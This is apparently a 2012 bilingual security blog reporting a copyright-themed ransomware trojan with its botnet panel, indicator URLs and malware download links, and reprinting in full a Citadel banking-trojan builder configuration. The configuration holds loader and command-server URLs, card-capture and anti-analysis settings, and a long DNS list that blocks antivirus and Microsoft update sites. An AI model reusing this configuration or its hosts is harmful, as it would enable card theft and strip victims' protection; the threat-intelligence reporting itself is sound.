martes, 25 de septiembre de 2012

Ransomeware Troyan - version intelecual property companies


The Ransomeware Troyan has been very popular lately known as "Police Troyan"  because after infection, user machine appeared locked showing a fake police webpage indicating that the user is suspected of certain crimes and his machine will remain locked until the payment of a penalty equivalent to certain amount of money.

At this time it was found a similar version of the Troyan Ransomeware with same fraud technique but this time pretending that victim has infringed some laws related to copyright and requesting payment of the appropriate sanction.

When user's computer has been infected, the Troyan redirects user navigation to the malicious URL:

hXXp://invalid-crew.com/start.php

This malicious script checks language settings that user has set on the browser to display a false webpage on user's language simulating the legitimate institutions of his country that are dedicated to protect copyright and intellectual property.

For Spanish users the Troyan redirect to the URL:

hXXp://invalid-crew.com/payz/iframe_ES.php

That will show the next screen simulating come from SGAE (General Society of Authors and Editors) – Spanish society



For Portugal:  hXXp://invalid-crew.com/payz/iframe_PT.php


For Italy:  hXXp://invalid-crew.com/payz/iframe_IT.php




For France:  hXXp://invalid-crew.com/payz/iframe_FR.php


For Germany: hXXp://invalid-crew.com/payz/iframe_DE.php


The domain invalid-crew.com is hosted on the IP 95.163.68.147 belonging to the IPS Digital Networks CJSC in Russia.

The Login screen to access Control Panel Ransomeware Troyan has been located at the addresses:

hXXp://invalid-crew.com/admin/login.php

And:

hXXp://invalid-crew.com/bull/login.php


Also has been located the control panel of BOTNET ZEMRA at:

hXXp://invalid-crew.com/abc/admin/


 This panel control 5384 infected user machines, there being a high percentage of percentage of Latinamerican users with compromised machines.

According to the statistics menu, bots malware spreading started on September 3, being the peak infections day September 5 with 2402 infected computers.




In the control panel it is also possible to follow downloads tasks of different malicious binaries on zombies computers.


 They are still active infection vectors of the Troyans:
  
hXXp://95.163.68.147/abc/rat.exe
hXXp://95.163.68.147/abc/rat1.exe
hXXp://95.163.68.147/abc/fud.exe
hXXp://95.163.68.147/abc/server.exe
hXXp://95.163.68.147/abc/cgg.exe

domingo, 23 de septiembre de 2012

Troyano Ransomeware versión SGAE – Sociedades de Autores


El troyano Ransomeware últimamente ha sido muy popular bajo la denominación de “troyano policía”, debido a que tras la infección el equipo de la victima aparecía bloqueado mostrando una supuesta pagina falsa de la policía en la que indicaba que el usuario era sospechoso de ciertos delitos y que su equipo se mantendría bloqueado hasta que no se pagara la multa equivalente a cierta cantidad monetaria.

En esta ocasión se ha localizado una versión similar con la misma técnica de fraude pero esta vez simulando que ha infringido un delito relacionado con los derechos de autor y solicitando el pago de la correspondiente sanción.

Cuando el equipo del usuario ha sido infectado, el troyano redirige la navegación del usuario hacia el enlace malicioso

hXXp://invalid-crew.com/start.php

que comprobará la configuración del idioma que tenga el usuario instalado en el navegador para mostrar la pantalla falsa en el idioma del usuario, simulando además las instituciones legitimas de dicho país que se dedican a proteger los derechos de autor y propiedad intelectual.

Para los usuarios españoles el troyano llevará hacia la dirección:

hXXp://invalid-crew.com/payz/iframe_ES.php

Que mostrará la siguiente pantalla simulando provenir de las SGAE:


Para Portugal:  hXXp://invalid-crew.com/payz/iframe_PT.php



Para Italia:  hXXp://invalid-crew.com/payz/iframe_IT.php




Para Francia:  hXXp://invalid-crew.com/payz/iframe_FR.php



Para Alemania: hXXp://invalid-crew.com/payz/iframe_DE.php


El dominio invalid-crew.com esta alojado en la IP 95.163.68.147 perteneciente al proveedor Digital Networks CJSC de Rusia.

 Las pantallas de acceso al Panel de Control del troyano se ha localizado en las direcciones:

hXXp://invalid-crew.com/admin/login.php

y

hXXp://invalid-crew.com/bull/login.php



También se ha localizado el Panel de control de la BOTNET ZEMRA en la dirección:

hXXp://invalid-crew.com/abc/admin/


Este panel controla 5384 equipos de usuarios infectados, existiendo un porcentaje bastante alto de usuarios latinos con su equipo comprometido.


Según el menú estadístico de seguimiento de bots infectados, la propagación de malware se inicio el 3 de septiembre , siendo el día pico de infecciones el 5 de Septiembre con 2402 equipos infectados:



También se puede visualizar en este panel el seguimiento de las tareas de descarga de los distintos binarios maliciosos en los equipos de los usuarios zombies.



Todavía están activos los vectores de infección de los troyanos:
  
hXXp://95.163.68.147/abc/rat.exe
hXXp://95.163.68.147/abc/rat1.exe
hXXp://95.163.68.147/abc/fud.exe
hXXp://95.163.68.147/abc/server.exe
hXXp://95.163.68.147/abc/cgg.exe

martes, 18 de septiembre de 2012

Archivo de configuración del troyano Citadel Builder 1.3.4.5


En este documento se presenta el fichero de configuración que utiliza el troyano Citadel , sucesor del famoso troyano bancario Zeus y que se utiliza para crear el binario malicioso que va a infectar a los usuarios y que posteriormente se comunicara con el servidor donde este alojada toda la infraestructura criminal.

Entre las novedades de esta nueva versión destaca su configuración modular  dependiendo de los complementos que se hayan comprado en el mercado negro.

Uno de estos módulos se trata del CardSwipe  ( Banda Magnética) cuya finalidad es la captura de todos los datos de las tarjetas de crédito necesarios para operar fraudulentamente con ellas.

En este fichero de configuración los criminales tienen activada esta opción:

  enable_luhn10_get 1
  enable_luhn10_post 1

Incluso se ha logrado reproducir la inyección que realiza el troyano en la máquina infectada capturando la pantalla que presenta para que el usuario introduzca todos sus datos de la tarjeta de crédito cuando accede a su banca por Internet.




Se observa como se solicita el numero secreto del PIN ( ATM Pin) y su código de identificación de la seguridad social (SSN) , datos que nunca son solicitados al cliente bajo ninguna circunstancia.

Otros parámetros de la configuración permite la captura de secuencias de video del equipo infectado

use_module_video 0
entry "Video"
    quality 1
    length 500
  end

Esto es muy útil para capturar la secuencia en tiempo real cuando el usuario introduce los códigos secretos de autorización de transferencia y evadir los sistemas de autenticación mediante teclado virtual.

Otros comandos también permiten capturar los datos enviados a través del navegador Chrome, habilitar la protección contra máquinas virtuales es impedir que el binario pueda ser analizado en estos entornos, desactivar el envio de cookies y bloquear el acceso a los sitios webs de las compañías de antivirus y protección contra malware. Redirigiendo al usuario a la pagina principal de Google  ( 209.85.229.104) cada vez que intenta acceder a ellas. Para ello no modifica el archivo hosts del equipo infectado sino que controla la cache DNS del equipo.

Incluso también bloquea el acceso a las paginas de los cuerpos de seguridad y de lucha contra el cibercrimen.


A continuación pasamos a mostrar la configuración del Citadel Builder 1.3.4.5




;; Default config + updated AV's list (redirect to google.com)
;; Citadel Builder 1.3.4.5
;; SHORT MANUAL BELOW ------------>
;; url_config1 is required!!! url_config2 & url_config3 are optional, you can setup it like a reserve config host.
;; report_software - report to gate about installed firewall,antivirus,software: 1 is enabled
;; disable_antivirus 0/1 - if you bought the MiniAV module, you can switch it off. 0 is enabled.
;; enable_luhn10_get 1/0 - if you bought the CardSwipe module, you can switch it on a GET parsing by LUHN10 algorithm.
;; enable_luhn10_post 1/0 - if you bought the CardSwipe module, you can switch it on a POST parsing by LUHN10 algorithm(en.wikipedia.org/wiki/Luhn_algorithm).
;; use_module_video 1/0 - Do you really want to use video grabber? If no, please switch it off. 1 is enabled.
;; disable_httpgrabber 1/0 - Do you want to switch off Chrome HTTP : // logs grabber? 1 is enabled.
;; package_max_size 50 - logs reports transmission size(KB), stay it as default.
;; timer_autoupdate 10 - Auto-update of exe file, specify time in hours. This option takes exe link from "url_loader" section.
;; antiemulation_enable 0/1 - if you enable it, you can't test it on virtual machines such as VMWare/Virtualbox.
;; disable_cookies 0/1 - if you setup 0, then cookies will send to your gate and .sol files will be deleted.
;; For other information please open the "Personal Manual"
;; IF YOU DON'T KNOW HOW TO SETUP THESE OPTIONS, YOU CAN USE OPTIMAL DEFAULT CONFIG.
;; <------------------ END OF SHORT MANUAL.

entry "StaticConfig"
  botnet "main"
  timer_config 15 20
  timer_logs  7 20
  timer_stats 10 20
  timer_modules 7 10
  timer_autoupdate 8
  url_config1 "http : //gremlindefault.net/mainsession/game_install.bin"

  remove_certs 1
;  disable_tcpserver 0
  disable_cookies 0
  disable_httpgrabber 1
  report_software 1
  disable_antivirus 0
  enable_luhn10_get 1
  enable_luhn10_post 1
  antiemulation_enable 0
  encryption_key "*******************************"
  use_module_video 0
end

entry "DynamicConfig"
  url_loader "http : //gremlindefault.net/mainsession/bbbllasw.exe"
  url_server "http : //gremlindefault.net/mainsession/redir.php"
  file_webinjects "webinjects.txt"
  entry "AdvancedConfigs"
            "http : //gremlindefault.net/mainsession/game_install.bin"
  end
  entry "WebFilters"
    "!http : //*"
  end
  entry "WebDataFilters"
    ;"http : //mail.rambler.ru/*" "passw;login"
  end
  entry "WebFakes"
    ;"http : //www.google.com" "http : //www.yahoo.com" "GP" "" ""
  end
  entry "DnsFilters"


bitdefender.com=209.85.229.104
download.bitdefender.com=209.85.229.104
update.bitdefender.com=209.85.229.104
wfbs51-p.activeupdate.trendmicro.com=209.85.229.104
wfbs60-p.activeupdate.trendmicro.com=209.85.229.104
iau.trendmicro.com=209.85.229.104
licenseupdate.trendmicro.com=209.85.229.104
csm-as.activeupdate.trendmicro.com=209.85.229.104
wfbs6-icss-p.activeupdate.trendmicro.com=209.85.229.104
oc.activeupdate.trendmicro.com=209.85.229.104
update.avg.com=209.85.229.104
update.grisoft.com=209.85.229.104
backup.avg.cz=209.85.229.104
backup.grisoft.cz=209.85.229.104
files2.grisoft.cz=209.85.229.104
files2.avg.cz=209.85.229.104
download.grisoft.cz=209.85.229.104
download.avg.cz=209.85.229.104
akamai.grisoft.cz=209.85.229.104
akamai.grisoft.cz.edgesuite.net=209.85.229.104
akamai.avg.cz=209.85.229.104
akamai.avg.cz.edgesuite.net=209.85.229.104
akamai.grisoft.com=209.85.229.104
akamai.avg.com=209.85.229.104
akamai.grisoft.com.edgesuite.net=209.85.229.104
akamai.avg.com.edgesuite.net=209.85.229.104
data-cdn.mbamupdates.com=209.85.229.104
su.pctools.com=209.85.229.104
pctools.com=209.85.229.104
download.lavasoft.com=209.85.229.104
secure.lavasoft.com=209.85.229.104
lavasoft.com=209.85.229.104
bitdefender.nl=209.85.229.104
virustotal.com=209.85.229.104
trendmicro.nl=209.85.229.104
trendmicro.com.au=209.85.229.104
www.trendmicro.com.au=209.85.229.104
securesoft.com.au=209.85.229.104
avira.com.au=209.85.229.104
gratissoftwaresite.nl=209.85.229.104
nod32.com.au=209.85.229.104
pandasecurity.com.au=209.85.229.104
lavasoft.com.au=209.85.229.104
avg.com.au=209.85.229.104
symantec-norton.com=209.85.229.104
housecall.trendmicro.com=209.85.229.104
forums.malwarebytes.org=209.85.229.104
malwarebytes.org=209.85.229.104
pchelpforum.com=209.85.229.104
pchelpforum.com=209.85.229.104
forums.cnet.com=209.85.229.104
techsupportforum.com=209.85.229.104
gratissoftware.nu=209.85.229.104
majorgeeks.com=209.85.229.104
forums.pcworld.com=209.85.229.104
antivirus.microbe.com.au=209.85.229.104
avast.com.au=209.85.229.104
avg-antivirus.com.au=209.85.229.104
nortonantiviruscenter.com=209.85.229.104
threatmetrix.com=209.85.229.104
www.zonealarm.com=209.85.229.104
firewallguide.com=209.85.229.104
auditmypc.com=209.85.229.104
comodo.com=209.85.229.104
free-firewall.org=209.85.229.104
schoonepc.nl=209.85.229.104
iopus.com=209.85.229.104
tucows.com=209.85.229.104
avg-antivirus-plus-firewall.en.softonic.com=209.85.229.104
superantispyware.com.au=209.85.229.104
superantispyware.com=209.85.229.104
harveynorman.com.au=209.85.229.104
ca-store.com.au=209.85.229.104
netfreighters.com.au=209.85.229.104
securetec.com.au=209.85.229.104
anti-spyware.com.au=209.85.229.104
virusscan.jotti.org=209.85.229.104
virscan.org=209.85.229.104
antivir.ru=209.85.229.104
analysis.avira.com=209.85.229.104
hijackthis.de=209.85.229.104
uploadmalware.com=209.85.229.104
emsisoft.com=209.85.229.104
kaspersky.co.uk=209.85.229.104
bitdefender.co.uk=209.85.229.104
eset.co.uk=209.85.229.104
webroot.com=209.85.229.104
gdatasoftware.co.uk=209.85.229.104
pcpro.co.uk=209.85.229.104
webroot.co.uk=209.85.229.104
cyprotect.com=209.85.229.104
cloudantivirus.com=209.85.229.104
drweb-antivir.it=209.85.229.104
escanav.com=209.85.229.104
clamwin.com=209.85.229.104
nod32.nl=209.85.229.104
webroot.nl=209.85.229.104
av.eu=209.85.229.104
vergelijk.nl=209.85.229.104
antivirusvergelijk.nl=209.85.229.104
virussen.upc.nl=209.85.229.104
antivirus.startpagina.nl=209.85.229.104
avastav.nl=209.85.229.104
defenx.nl=209.85.229.104
gdata.nl=209.85.229.104
bitdefender.nl=209.85.229.104
removevirus.org=209.85.229.104
windows.microsoft.com=209.85.229.104
answers.microsoft.com=209.85.229.104
myantispyware.com=209.85.229.104
krebsonsecurity.com=209.85.229.104
antivirus.about.com=209.85.229.104
cleanuninstall.com=209.85.229.104
staples.com=209.85.229.104
esetindia.com=209.85.229.104
mcafee.free-trials.net=209.85.229.104
antivir-2012.com=209.85.229.104
panda-antivirus.en.softonic.com=209.85.229.104
softonic.com=209.85.229.104
freeantivirushelp.com=209.85.229.104
scanwith.com=209.85.229.104
bestantivirusreviewed.com=209.85.229.104
virus-help.net=209.85.229.104
cleanallspyware.com=209.85.229.104
kingsoftsecurity.com=209.85.229.104
threatfire.com=209.85.229.104
freeavg.com=209.85.229.104
clamav.net=209.85.229.104
pcthreat.com=209.85.229.104
2-viruses.com=209.85.229.104
trojan-killer.ne=209.85.229.104
virusinfo.info=209.85.229.104
www.virusinfo.info=209.85.229.104
projecthoneypot.org=209.85.229.104
www.projecthoneypot.org=209.85.229.104
novirus.ru=209.85.229.104
www.novirus.ru=209.85.229.104
anti-malware.com=209.85.229.104
www.anti-malware.com=209.85.229.104
offensivecomputing.net=209.85.229.104
www.offensivecomputing.net=209.85.229.104
zeustracker.abuse.ch=209.85.229.104
www.zeustracker.abuse.ch=209.85.229.104
www.malekal.com=209.85.229.104
www3.malekal.com=209.85.229.104
forum.malekal.com=209.85.229.104
www.threatexpert.com=209.85.229.104
threatexpert.com=209.85.229.104
www.microsoft.com=209.85.229.104
update.microsoft.com=209.85.229.104
www.virustotal.com=209.85.229.104
virusscan.jotti.org=209.85.229.104
www.av-comparatives.org=209.85.229.104
av-comparatives.org=209.85.229.104
av-test.org=209.85.229.104
www.av-test.org=209.85.229.104
www.scanwith.com=209.85.229.104
trendmicro.com.au=209.85.229.104
kasperskyanz.com.au=209.85.229.104
bitdefender.com.au=209.85.229.104
eset.com.au=209.85.229.104
vet.com.au=209.85.229.104
sm.mcafee.com=209.85.229.104
home.mcafee.com=209.85.229.104
toolbar.avg.com=209.85.229.104
stats.avg.com=209.85.229.104
www.virusbtn.com=209.85.229.104
adwarereport.com=209.85.229.104
avg.com.au=209.85.229.104
www.adwarereport.com=209.85.229.104
malwarebytes.org=209.85.229.104
www.malwarebytes.org=209.85.229.104
dw.com.com=209.85.229.104
nss-shasta-rrs.symantec.com=209.85.229.104
spywarewarrior.com=209.85.229.104
www.spywarewarrior.com=209.85.229.104
avsoft.ru=209.85.229.104
www.avsoft.ru=209.85.229.104
onecare.live.com=209.85.229.104
anubis.iseclab.org=209.85.229.104
wepawet.iseclab.org=209.85.229.104
iseclab.org=209.85.229.104
www.iseclab.org=209.85.229.104
www.freespaceinternetsec=209.85.229.104urity.com
freespaceinternetsecurit=209.85.229.104y.com
sunbelt-software.com=209.85.229.104
www.sunbelt-software.com=209.85.229.104
www.prevx.com=209.85.229.104
prevx.com=209.85.229.104
analysis.seclab.tuwien.a=209.85.229.104c.at
www.joebox.org=209.85.229.104
joebox.org=209.85.229.104
gmer.net=209.85.229.104
www.gmer.net=209.85.229.104
antirootkit.com=209.85.229.104
www.antirootkit.com=209.85.229.104
sectools.org=209.85.229.104
www.sandboxie.com=209.85.229.104
sandboxie.com=209.85.229.104
nepenthes.mwcollect.org=209.85.229.104
mwcollect.org=209.85.229.104
www.amtso.org=209.85.229.104
amtso.org=209.85.229.104
www.nsslabs.com=209.85.229.104
nsslabs.com=209.85.229.104
www.icsalabs.com=209.85.229.104
icsalabs.com=209.85.229.104
www.checkvir.com=209.85.229.104
checkvir.com=209.85.229.104
www.check-mark.com=209.85.229.104
check-mark.com=209.85.229.104
www.protectstar-testlab.=209.85.229.104org
protectstar-testlab.org=209.85.229.104
www.anti-malware-test.co=209.85.229.104m
anti-malware-test.com=209.85.229.104
av-test.de=209.85.229.104
www.av-test.de=209.85.229.104
www.wildlist.org=209.85.229.104
wildlist.org=209.85.229.104
www.aavar.org=209.85.229.104
aavar.org=209.85.229.104
centralops.net=209.85.229.104
www.staysafeonline.info=209.85.229.104
staysafeonline.info=209.85.229.104
www.rokop-security.de=209.85.229.104
rokop-security.de=209.85.229.104
www.wilderssecurity.com=209.85.229.104
wilderssecurity.com=209.85.229.104
www.superantispyware.com=209.85.229.104
superantispyware.com=209.85.229.104
update.microsoft.com=209.85.229.104
www.kaspersky.com=209.85.229.104
www.kaspersky.ru=209.85.229.104
kaspersky.ru=209.85.229.104
www.avp.ru=209.85.229.104
avp.ru=209.85.229.104
www.viruslist.com=209.85.229.104
viruslist.com=209.85.229.104
www.viruslist.ru=209.85.229.104
www.kaspersky-antivirus.ru=209.85.229.104
kaspersky-antivirus.ru=209.85.229.104
downloads1.kaspersky-labs.com=209.85.229.104
downloads2.kaspersky-labs.com=209.85.229.104
downloads3.kaspersky-labs.com=209.85.229.104
downloads4.kaspersky-labs.com=209.85.229.104
downloads5.kaspersky-labs.com=209.85.229.104
downloads-us1.kaspersky-labs.com=209.85.229.104
downloads-us2.kaspersky-labs.com=209.85.229.104
downloads-us3.kaspersky-labs.com=209.85.229.104
downloads-eu1.kaspersky-labs.com=209.85.229.104
downloads-eu2.kaspersky-labs.com=209.85.229.104
kavdumps.kaspersky.com=209.85.229.104
www.kasperskyclub.com=209.85.229.104
forum.kasperskyclub.com=209.85.229.104
forum.kasperskyclub.ru=209.85.229.104
kasperskyclub.ru=209.85.229.104
kasperskyclub.com=209.85.229.104
ftp.kasperskylab.ru=209.85.229.104
ftp.kaspersky.ru=209.85.229.104
ftp.kaspersky-labs.com=209.85.229.104
data.kaspersky.ru=209.85.229.104
z-oleg.com=209.85.229.104
www.z-oleg.com=209.85.229.104
drweb.com=209.85.229.104
www.drweb.com=209.85.229.104
freedrweb.com=209.85.229.104
www.freedrweb.com=209.85.229.104
drweb.com.ua=209.85.229.104
www.drweb.com.ua=209.85.229.104
drweb.ru=209.85.229.104
www.drweb.ru=209.85.229.104
av-desk.com=209.85.229.104
www.av-desk.com=209.85.229.104
drweb.net=209.85.229.104
www.drweb.net=209.85.229.104
ftp.drweb.com=209.85.229.104
dr-web.ru=209.85.229.104
www.dr-web.ru=209.85.229.104
download.drweb.com=209.85.229.104
support.drweb.com=209.85.229.104
updates.sald.com=209.85.229.104
sald.com=209.85.229.104
www.sald.com=209.85.229.104
drweb.imshop.de=209.85.229.104
safeweb.norton.com=209.85.229.104
www.safeweb.norton.com=209.85.229.104
www.symantec.com=209.85.229.104
shop.symantecstore.com=209.85.229.104
liveupdate.symantec.com=209.85.229.104
liveupdate.symantecliveu=209.85.229.104pdate.com
service1.symantec.com=209.85.229.104
www.service1.symantec.co=209.85.229.104m
security.symantec.com=209.85.229.104
liveupdate.symantec.d4p.=209.85.229.104net
securityresponse.symante=209.85.229.104c.com
sygate.com=209.85.229.104
www.sygate.com=209.85.229.104
esetnod32.ru=209.85.229.104
www.esetnod32.ru=209.85.229.104
eset.com=209.85.229.104
www.eset.com=209.85.229.104
eset.com.ua=209.85.229.104
www.eset.com.ua=209.85.229.104
nod32.com.ua=209.85.229.104
www.nod32.com.ua=209.85.229.104
download.eset.com=209.85.229.104
update.eset.com=209.85.229.104
eset.eu=209.85.229.104
www.eset.eu=209.85.229.104
nod32.it=209.85.229.104
www.nod32.it=209.85.229.104
nod32.su=209.85.229.104
www.nod32.su=209.85.229.104
nod-32.ru=209.85.229.104
www.nod-32.ru=209.85.229.104
allnod.com=209.85.229.104
www.allnod.com=209.85.229.104
allnod.info=209.85.229.104
www.allnod.info=209.85.229.104
virusall.ru=209.85.229.104
www.virusall.ru=209.85.229.104
nod32eset.org=209.85.229.104
www.nod32eset.org=209.85.229.104
eset.sk=209.85.229.104
www.eset.sk=209.85.229.104
nod32.nl=209.85.229.104
www.nod32.nl=209.85.229.104
dl1.antivir.de=209.85.229.104
dl2.antivir.de=209.85.229.104
dl3.antivir.de=209.85.229.104
dl4.antivir.de=209.85.229.104
free-av.com=209.85.229.104
www.free-av.com=209.85.229.104
free-av.de=209.85.229.104
www.free-av.de=209.85.229.104
avira.com=209.85.229.104
www.avira.com=209.85.229.104
avira.de=209.85.229.104
www.avira.de=209.85.229.104
www1.avira.com=209.85.229.104
dlpro.antivir.com=209.85.229.104
forum.avira.com=209.85.229.104
www.forum.avira.com=209.85.229.104
avirus.ru=209.85.229.104
www.avirus.ru=209.85.229.104
avira-antivir.ru=209.85.229.104
www.avira-antivir.ru=209.85.229.104
avirus.com.ua=209.85.229.104
www.avirus.com.ua=209.85.229.104
mcafee.com=209.85.229.104
www.mcafee.com=209.85.229.104
home.mcafee.com=209.85.229.104
us.mcafee.com=209.85.229.104
ru.mcafee.com=209.85.229.104
de.mcafee.com=209.85.229.104
ca.mcafee.com=209.85.229.104
fr.mcafee.com=209.85.229.104
au.mcafee.com=209.85.229.104
es.mcafee.com=209.85.229.104
it.mcafee.com=209.85.229.104
uk.mcafee.com=209.85.229.104
mx.mcafee.com=209.85.229.104
ru.mcafee.com=209.85.229.104
mcafee-online.com=209.85.229.104
www.mcafee-online.com=209.85.229.104
mcafeesecurity.com=209.85.229.104
www.mcafeesecurity.com=209.85.229.104
mcafeesecure.com=209.85.229.104
www.mcafeesecure.com=209.85.229.104
avertlabs.com=209.85.229.104
www.avertlabs.com=209.85.229.104
download.nai.com=209.85.229.104
nai.com=209.85.229.104
www.nai.com=209.85.229.104
secure.nai.com=209.85.229.104
eu.shopmcafee.com=209.85.229.104
shop.mcafee.com=209.85.229.104
siblog.mcafee.com=209.85.229.104
mcafeestore.com=209.85.229.104
www.mcafeestore.com=209.85.229.104
service.mcafee.com=209.85.229.104
siteadvisor.com=209.85.229.104
www.siteadvisor.com=209.85.229.104
scanalert.com=209.85.229.104
www.drsolomon.com=209.85.229.104
mcafee-at-home.com=209.85.229.104
wwww.mcafee-at-home.com=209.85.229.104
networkassociates.com=209.85.229.104
www.networkassociates.com=209.85.229.104
avast.ru=209.85.229.104
www.avast.ru=209.85.229.104
avast.com=209.85.229.104
www.avast.com=209.85.229.104
onlinescan.avast.com=209.85.229.104
download1.avast.com=209.85.229.104
download2.avast.com=209.85.229.104
download3.avast.com=209.85.229.104
download4.avast.com=209.85.229.104
download5.avast.com=209.85.229.104
download6.avast.com=209.85.229.104
download7.avast.com=209.85.229.104
free.avg.com=209.85.229.104
au.norton.com=209.85.229.104
trustdefender.com=209.85.229.104
avg.com=209.85.229.104
www.avg.com=209.85.229.104
sshop.avg.com=209.85.229.104
pctools.com=209.85.229.104
www.grisoft.cz=209.85.229.104
www.grisoft.com=209.85.229.104
free.grisoft.com=209.85.229.104
bitdefender.com=209.85.229.104
www.bitdefender.com=209.85.229.104
msecn.net=209.85.229.104
bitdefender.de=209.85.229.104
www.bitdefender.de=209.85.229.104
bitdefender.com.ua=209.85.229.104
www.bitdefender.com.ua=209.85.229.104
bitdefender.ru=209.85.229.104
www.bitdefender.ru=209.85.229.104
myaccount.bitdefender.co,=209.85.229.104
download.bitdefender.com=209.85.229.104
ftp.bitdefender.com=209.85.229.104
forum.bitdefender.com=209.85.229.104
upgrade.bitdefender.com=209.85.229.104
agnitum.ru=209.85.229.104
www.agnitum.ru=209.85.229.104
agnitum.com=209.85.229.104
www.agnitum.com=209.85.229.104
agnitum.de=209.85.229.104
www.agnitum.de=209.85.229.104
outpostfirewall.com=209.85.229.104
www.outpostfirewall.com=209.85.229.104
dl1.agnitum.com=209.85.229.104
dl2.agnitum.com=209.85.229.104
antivirus.comodo.com=209.85.229.104
comodo.com=209.85.229.104
www.comodo.com=209.85.229.104
forums.comodo.com=209.85.229.104
comodogroup.com=209.85.229.104
www.comodogroup.com=209.85.229.104
personalfirewall.comodo.com=209.85.229.104
www.personalfirewall.com=209.85.229.104
hackerguardian.com=209.85.229.104
www.hackerguardian.com=209.85.229.104
www.nsclean.com=209.85.229.104
nsclean.com=209.85.229.104
clamav.net=209.85.229.104
www.clamav.net=209.85.229.104
db.local.clamav.net=209.85.229.104
clamsupport.sourcefire.com=209.85.229.104
lurker.clamav.net=209.85.229.104
wiki.clamav.net=209.85.229.104
w32.clamav.net=209.85.229.104
lists.clamav.net=209.85.229.104
clamwin.com=209.85.229.104
www.clamwin.com=209.85.229.104
ru.clamwin.com=209.85.229.104
gietl.com=209.85.229.104
www.gietl.com=209.85.229.104
clamav.dyndns.org=209.85.229.104
f-secure.com=209.85.229.104
www.f-secure.com=209.85.229.104
support.f-secure.com=209.85.229.104
f-secure.ru=209.85.229.104
www.f-secure.ru=209.85.229.104
ftp.f-secure.com=209.85.229.104
europe.f-secure.com=209.85.229.104
www.europe.f-secure.com=209.85.229.104
f-secure.de=209.85.229.104
www.f-secure.de=209.85.229.104
support.f-secure.de=209.85.229.104
ftp.f-secure.de=209.85.229.104
f-secure.co.uk=209.85.229.104
www.f-secure.co.uk=209.85.229.104
retail.sp.f-secure.com=209.85.229.104
retail01.sp.f-secure.com=209.85.229.104
retail02.sp.f-secure.com=209.85.229.104
ftp.europe.f-secure.com=209.85.229.104
norman.com=209.85.229.104
www.norman.com=209.85.229.104
download.norman.no=209.85.229.104
sandbox.norman.no=209.85.229.104
norman.no=209.85.229.104
www.norman.no=209.85.229.104
niuone.norman.no=209.85.229.104
pandasecurity.com=209.85.229.104
www.pandasecurity.com=209.85.229.104
viruslab.ru=209.85.229.104
www.viruslab.ru=209.85.229.104
pandasoftware.com=209.85.229.104
www.pandasoftware.com=209.85.229.104
acs.pandasoftware.com=209.85.229.104
www.pandasoftware.es=209.85.229.104
anti-virus.by=209.85.229.104
www.anti-virus.by=209.85.229.104
virusblokada.ru=209.85.229.104
www.virusblokada.ru=209.85.229.104
vba32.de=209.85.229.104
www.vba32.de=209.85.229.104
ftp.nai.com=209.85.229.104
secuser.com=209.85.229.104
www.secuser.com=209.85.229.104
tds.diamondcs.com.au=209.85.229.104
windowsupdate.microsoft.com=209.85.229.104
lavasoftusa.com=209.85.229.104
www.lavasoftusa.com=209.85.229.104
lavasoftusa.de=209.85.229.104
www.lavasoftusa.de=209.85.229.104
diamondcs.com.au=209.85.229.104
shop.ca.com=209.85.229.104
downloads.my-etrust.com=209.85.229.104
v4.windowsupdate.microsoft.com=209.85.229.104
v5.windowsupdate.microsoft.com=209.85.229.104
noadware.net=209.85.229.104
www.noadware.net=209.85.229.104
zonelabs.com=209.85.229.104
www.zonelabs.com=209.85.229.104
moosoft.com=209.85.229.104
www.moosoft.com=209.85.229.104
secuser.model-fx.com=209.85.229.104
pccreg.antivirus.com=209.85.229.104
k-otik.com=209.85.229.104
vupen.com=209.85.229.104
www.vupen.com=209.85.229.104
housecall.trendmicro.com=209.85.229.104
trendmicro.com=209.85.229.104
www.trendmicro.com=209.85.229.104
us.trendmicro.com=209.85.229.104
uk.trendmicro.com=209.85.229.104
de.trendmicro.com=209.85.229.104
fr.trendmicro.com=209.85.229.104
es.trendmicro.com=209.85.229.104
au.trendmicro.com=209.85.229.104
it.trendmicro.com=209.85.229.104
br.trendmicro.com=209.85.229.104
antivirus.cai.com=209.85.229.104
sophos.com=209.85.229.104
www.sophos.com=209.85.229.104
securitoo.com=209.85.229.104
nordnet.com=209.85.229.104
www.nordnet.com=209.85.229.104
avgfrance.com=209.85.229.104
www.avgfrance.com=209.85.229.104
antivirus-online.de=209.85.229.104
www.antivirus-online.de=209.85.229.104
ftp.esafe.com=209.85.229.104
ftp.microworldsystems.com=209.85.229.104
ftp.ca.co=209.85.229.104
files.trendmicro-europe.com=209.85.229.104
inline-software.de=209.85.229.104
ravantivirus.com=209.85.229.104
www.ravantivirus.com=209.85.229.104
f-prot.com=209.85.229.104
www.f-prot.com=209.85.229.104
files.f-prot.com=209.85.229.104
secure.f-prot.com=209.85.229.104
vsantivirus.com=209.85.229.104
www.vsantivirus.com=209.85.229.104
openantivirus.org=209.85.229.104
www.openantivirus.org=209.85.229.104
www3.ca.com=209.85.229.104
dialognauka.ru=209.85.229.104
www.dialognauka.ru=209.85.229.104
anti-virus-software-review.com=209.85.229.104
www.anti-virus-software-review.com=209.85.229.104
www.vet.com.au=209.85.229.104
antiviraldp.com=209.85.229.104
www.antiviraldp.com=209.85.229.104
www.proantivirus.com=209.85.229.104
pestpatrol.com=209.85.229.104
www.pestpatrol.com=209.85.229.104
simplysup.com=209.85.229.104
www.simplysup.com=209.85.229.104
misec.net=209.85.229.104
www.misec.net=209.85.229.104
www1.my-etrust.com=209.85.229.104
authentium.com=209.85.229.104
www.authentium.com=209.85.229.104
finjan.com=209.85.229.104
www.finjan.com=209.85.229.104
www.ikarus-software.at=209.85.229.104
www.ika-rus.com=209.85.229.104
ika-rus.com=209.85.229.104
tinysoftware.com=209.85.229.104
www.tinysoftware.com=209.85.229.104
visualizesoftware.com=209.85.229.104
www.visualizesoftware.com=209.85.229.104
kerio.com=209.85.229.104
www.kerio.com=209.85.229.104
www.kerio.eu=209.85.229.104
www.zonelabs.com=209.85.229.104
zonelog.co.uk=209.85.229.104
www.zonelog.co.uk=209.85.229.104
webroot.com=209.85.229.104
www.webroot.com=209.85.229.104
www.lavasoft.nu=209.85.229.104
spywareguide.com=209.85.229.104
www.spywareguide.com=209.85.229.104
spyblocker-software.com=209.85.229.104
www.spyblocker-software.com=209.85.229.104
www.spamhaus.org=209.85.229.104
spamcop.net=209.85.229.104
www.spamcop.net=209.85.229.104
bobbear.co.uk=209.85.229.104
www.bobbear.co.uk=209.85.229.104
domaintools.com=209.85.229.104
www.domaintools.com=209.85.229.104
centralops.net=209.85.229.104
www.centralops.net=209.85.229.104
www.robtex.com=209.85.229.104
dnsstuff.com=209.85.229.104
www.dnsstuff.com=209.85.229.104
